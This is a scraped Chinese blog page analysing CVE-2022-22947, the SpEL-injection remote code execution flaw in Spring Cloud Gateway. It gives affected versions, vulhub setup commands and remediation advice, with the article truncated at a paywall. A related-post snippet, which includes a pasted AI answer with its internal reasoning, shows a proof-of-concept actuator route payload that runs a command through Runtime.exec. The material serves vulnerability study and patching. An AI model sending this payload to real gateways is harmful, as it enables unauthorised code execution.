Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现

最新推荐文章于 2025-09-11 04:21:08 发布
原创 最新推荐文章于 2025-09-11 04:21:08 发布 · 2.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #https

本文详细分析了Spring Cloud Gateway的CVE-2022-22947远程代码执行漏洞,包括漏洞描述、影响范围、环境搭建、漏洞分析、复现步骤和修复建议。攻击者可通过构造恶意请求,利用未保护的执行器端点执行任意代码。建议受影响的用户尽快禁用相关端点或更新到安全版本。

0x01 漏洞描述

Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。

据公布的漏洞描述称,当Spring Cloud Gateway 执行器端点启用、公开且不安全时,使用Spring Cloud Gateway的应用程序容易受到代码注入攻击。远程攻击者可以发出含有恶意代码的请求,从而允许在远程主机上任意远程执行。

图片

0x02 漏洞影响

漏洞编号:CVE-2022-22947

影响版本:

  • Spring Cloud Gateway < 3.1.1

  • Spring Cloud Gateway < 3.0.7

  • Spring Cloud Gateway 较低、不受支持的版本也会受到影响

风险等级:

【高危】攻击者可利用该漏洞远程执行任意代码,目前已发现公开漏洞POC。

0x03 环境搭建

本次在ubuntu云服务器上利用docker搭建漏洞复现环境

git clone https://github.com/vulhub/vulhub 
cd vulhub/spring/CVE-2022-22947/
docker-compose up -d //启动环境
docker ps -a //查看测试环境运行情况

图片
访问地址:http://IP:8080
图片

0x04 漏洞分析

部分源码:

static Object getValue(SpelExpressionParser parser, BeanFactory beanFactory,
String entryValue) {
Object value;
String rawValue = entryValue;
if (rawValue != null) {
rawValue = rawValue.trim();
}
if (rawVal
最低0.47元/天 解锁文章
Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947
hjseo_seg的博客
08-02 818
SpringCloudGatewaySpringCloud下的一个项目,该项目是基于Spring5.0、SpringBoot2.0和ProjectReactor等技术开发的网关,它旨在为微服务架构提供一种简单有效、统一的API路由管理方式。使用SpringCloudGateway的应用如果对外暴露了GatewayActuator接口,则可能存在被CVE-2022-22947漏洞利用的风险。,获取系统权限。漏洞利用的前置条件。...
SpringCloudGateway远程代码执行CVE-2022-22947
m0_57379855的博客
03-12 1687
@TOC 基本介绍 微服务架构与Spring Cloud 【1】微服务架构 是一项在云中部署应用和服务的新技术。大部分围绕微服务的争论都集中在容器或其他技术是否能很好的实施微服务,而红帽说API应该是重点。 微服务可以在“自己的程序”中运行,并通过“轻量级设备与HTTP型API进行沟通”。 关键在于该服务可以在自己的程序中运行。 通过这一点我们就可以将服务公开与微服务架构(在现有系统中分布一个API)区分开来。 在服务公开中,许多服务都可以被内部独立进程所限制。 如果其中任何一个服务需要增加某种功能,那么就
CVE-2022-22947源码分析漏洞复现
spinage的博客
05-22 1398
CVE-2022-22947Spring Cloud Gateway 中的一个高危远程代码执行(RCE)漏洞,CVSSv3 评分为 10.0。该漏洞影响 Spring Cloud Gateway 3.1.x < 3.1.1 和 3.0.x < 3.0.7 版本。漏洞的成因在于 ShortcutConfigurable 接口在处理路由过滤器参数时,使用 StandardEvaluationContext 解析用户输入的参数值,导致攻击者可通过 AddResponseHeader 等过滤器的 value
实验报告:CVE-2022-22947复现
gitblog_00654的博客
09-11 414
- 操作系统:Ubuntu 22.04 - Docker版本:20.10.12 - 目标应用:Spring Cloud Gateway 3.1.0 ## 二、漏洞原理 SpEL表达式注入通过Actuator API实现... ## 三、复现步骤 1. 添加恶意路由 2. 触发表达式执行 3. 验证命令执行结果 ## 四、防御建议 - 升级到安全版本 - 禁用不必要的Actuator端点 - ...
CVE-2022-22947 分析
KeJiGuaiKa的博客
09-01 295
的官方补丁 [Comparing v3.0.6…v3.0.7 · spring-cloud/spring-cloud-gateway],官方在。在关键位置打上断点后,运行 app 尝试进入漏洞点。翻阅下官方文档 Spring Cloud Gateway[^1] 看下如何定义一个简单的路由。那如何通过远程触发呢?根据 Gateway Actuator API [^2] 文档,接口提供了创建路由的能力 其中 json 构造方式如文档中的。通过 POST 发送 exp。debug 程序后,发现。...
CVE-2022-22947Spring Cloud Gateway RCE漏洞分析以及复现
qq_50808416的博客
05-15 4027
Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。Spring官方博客发布了一篇关于Spring Cloud GatewayCVE报告,据公告描述,当启用和暴露Gateway Actuator端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。
Spring Cloud Gateway 远程代码执行CVE-2022-22947
m0_62484818的博客
10-09 927
Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的 API路由管理方式。Spring Cloud GatewaySpring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。
Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947
weixin_42299610的博客
06-02 1124
Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947
CVE-2022-22947Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
aihua002的博客
11-21 1455
1.漏洞说明:2022年3月1日,VMware官方发布漏洞报告,在使用Spring Colud Gateway的应用程序开启、暴露Gateway端点时,会容易造成代码注入攻击,攻击者可以制造恶意请求,在远程主机进行任意远程执行。2.漏洞编号:3.影响范围:旧的、不受支持的版本也会受到影响4.漏洞级别:高危。
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
weixin_45260839的博客
05-08 3597
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
Spring Cloud Gateway RCE漏洞原理分析复现CVE-2022-22947
日常技术分享
10-16 8887
Spring Cloud Gateway RCE漏洞原理分析复现CVE-2022-22947
CVE-2022-22947
weixin_74020633的博客
06-04 2340
因为该漏洞是在使用Spring Colud Gateway的应用程序开启、暴露Gateway Actuator端点时,会容易造成代码注入攻击,攻击者可以制造恶意请求,在远程主机进行任意远程执行。至此我们利用这个CVE 通过添加查询路由的方式可以进行远程的命令执行,那么为什么能够利用呢,就涉及到java和函数方面,本人暂时没有学习java但是可以大致分享一下我学习到的。总结:这个漏洞是利用spEL表达式来包含命令,使得恶意的命令能被解析执行,在通过查询路由来回显信息,达到远程执行的目的。
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
m0_63299551的博客
06-24 1342
这里在burp抓包时要将burp代理地址改为本机地址要不然会抓不到 127.0.0.1的数据包。接着创建application.yml文件 具体步骤和代码如下。将pom.xml文件替换成下面所写的。接着配置maven 这里参考了一篇文章。可以看到环境搭建成功 接着进行漏洞复现
CVE-2022-22947 Spring Cloud Gateway远程代码执行
mirocky的博客
10-26 388
Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。
SpringCloud Gateway 远程代码执行漏洞
qq_33240556的博客
06-18 927
Spring Cloud Gateway(SCG)本身并没有远程代码执行漏洞,但是,如果你在配置过程中使用了不安全的代码或者依赖,可能会引入安全风险。:类似地,如果过滤器配置中的某些参数来自用户输入,且没有进行充分验证和过滤,也可能会被利用来执行远程代码。在使用自定义过滤器时,要确保传入过滤器的参数是安全的。:SCG依赖的其他库或组件可能存在安全漏洞,攻击者可以利用这些漏洞来执行远程代码。字段来自用户输入,且没有进行严格的验证和过滤,可能会被攻击者利用来执行远程代码。,就需要格外注意输入的合法性。
gateway漏洞CVE-2022-22947
super_vegetable_bird的博客
11-21 1087
早上被电话吵醒,线上环境出现Bug,很多接口请求都失败了,绕开网关请求各个微服务都是正常的,经过网关就异常了,观察到页面上接口路径都被莫名其妙的改了,去看日志发现网关出现了 Cannot fetch registry from server reactor.core.Exceptions$ErrorCallbackNotImplemented: java.lang.IndexOutOfBoundsException: Index: 0, Size: 0。表明在尝试访问一个空的列表时发生了越界异常。
CVE-2022-22947(Spring-Cloud-Gateway)
Christ1na的博客
04-09 1164
`SpringCloud Gateway` 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
最新发布
09-29
<think>嗯,用户想要了解Spring Cloud Gateway Actuator API中的SpEL表达式注入漏洞CVE-2022-22947)的详细信息。从用户提供的参考引用来看,这个漏洞主要涉及通过Actuator API注入恶意SpEL表达式实现命令执行。 用户特别提到需要了解漏洞原理、影响范围和修复方案等核心内容。看来用户可能是个安全工程师或者开发人员,正在处理相关漏洞的修复工作。ta的提问非常聚焦,说明对漏洞已有基本认知,现在需要深入的技术细节。 从漏洞原理分析: 1. 关键点在ShortcutConfigurable接口的getValue()方法,它使用了StandardEvaluationContext来执行SpEL表达式而非更安全的SimpleEvaluationContext 2. Actuator API端点暴露了路由配置功能,攻击者可以通过构造特定请求注入恶意表达式 3. 由于StandardEvaluationContext支持全部SpEL功能,导致可执行系统命令 影响范围需要特别注意: - 官方明确影响的版本是3.1.x < 3.1.1 和 3.0.x < 3.0.7 - 但引用中提到"不受支持的旧版本也会受影响",这点需要强调,因为很多人会忽略EOL版本的风险 修复方案要分层次说明: - 首选肯定是升级到安全版本 - 对于无法升级的情况,需要给出替代方案(比如禁用Actuator端点) - 还要提醒Spring Boot Actuator的安全配置注意事项 用户没有提到复现细节,但作为完整响应,应该简要包含漏洞利用特征(比如恶意路由的构造方式),这样有助于用户识别攻击痕迹。不过要注意控制技术细节的深度,避免成为攻击手册。 考虑到用户是技术人员,可以使用专业术语,但涉及代码的部分要用$...$包裹行内表达式,比如StandardEvaluationContext解析$...$的过程。独立代码块展示curl攻击示例时需要完整转义特殊字符。 最后生成的三个问题要延续技术深度: 1. 漏洞检测方法 - 这是用户后续可能需要的 2. 利用限制条件 - 帮助评估实际风险 3. 历史类似漏洞 - 提供扩展学习方向 </think>以下是关于 **Spring Cloud Gateway Actuator API SpEL表达式注入漏洞CVE-2022-22947)** 的详细分析,涵盖漏洞原理、影响范围、修复方案及复现逻辑: --- ### **漏洞原理** 1. **核心缺陷** Spring Cloud Gateway 的 `ShortcutConfigurable` 接口中,`getValue()` 方法使用 `StandardEvaluationContext` 解析 SpEL 表达式。该类允许执行**任意Java代码**(如 `T(java.lang.Runtime).getRuntime().exec("命令")`),未限制表达式执行权限[^1]。 *关键代码示例*: ```java // 漏洞点:使用StandardEvaluationContext(非安全模式) ExpressionParser parser = new SpelExpressionParser(); StandardEvaluationContext context = new StandardEvaluationContext(); parser.parseExpression(恶意表达式).getValue(context); // 可执行系统命令 ``` 2. **攻击入口** 通过 **Actuator API** 的路由管理端点(`/actuator/gateway/routes`)注入恶意 SpEL 表达式。攻击者构造包含恶意表达式的路由配置,Gateway 在刷新路由时触发表达式解析,实现远程命令执行[^1][^2]。 --- ### **影响范围** | 组件 | 受影响版本 | 安全版本 | |---------------------|-------------------------------|------------------------| | Spring Cloud Gateway | 3.1.x < 3.1.1 | >= 3.1.1 | | | 3.0.x < 3.0.7 | >= 3.0.7 | | | 旧版且官方已停止支持的版本 | 需升级或缓解措施 | --- ### **漏洞复现步骤** 1. **构造恶意路由** 向 `/actuator/gateway/routes/{id}` 发送 **POST** 请求,在 `filters` 字段注入 SpEL 表达式: ```json { "filters": [{ "name": "AddResponseHeader", "args": { "name": "X-Exploit", "value": "#{T(java.lang.Runtime).getRuntime().exec('calc.exe')}" } }] } ``` 2. **触发漏洞** 访问 `/actuator/gateway/refresh` 刷新路由,触发恶意表达式执行(如弹出计算器)。 --- ### **修复方案** 1. **官方升级** - 升级至安全版本:**Spring Cloud Gateway 3.1.1+** 或 **3.0.7+** - *修复逻辑*:将 `StandardEvaluationContext` 替换为 `SimpleEvaluationContext`(限制表达式执行能力)[^2]。 2. **临时缓解措施** - **禁用 Actuator 端点**:在 `application.yml` 中添加: ```yaml management: endpoint: gateway: enabled: false # 关闭Gateway Actuator端点 endpoints: web: exposure: include: "" # 禁止暴露所有Actuator端点 ``` - **网络隔离**:限制外部访问 `/actuator/*` 路径。 --- ### **漏洞利用条件** - 攻击者需能访问 **Actuator API**(默认端口 `8080`) - 目标系统未禁用 `gateway` Actuator 端点 - 使用未修复的 Spring Cloud Gateway 版本
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值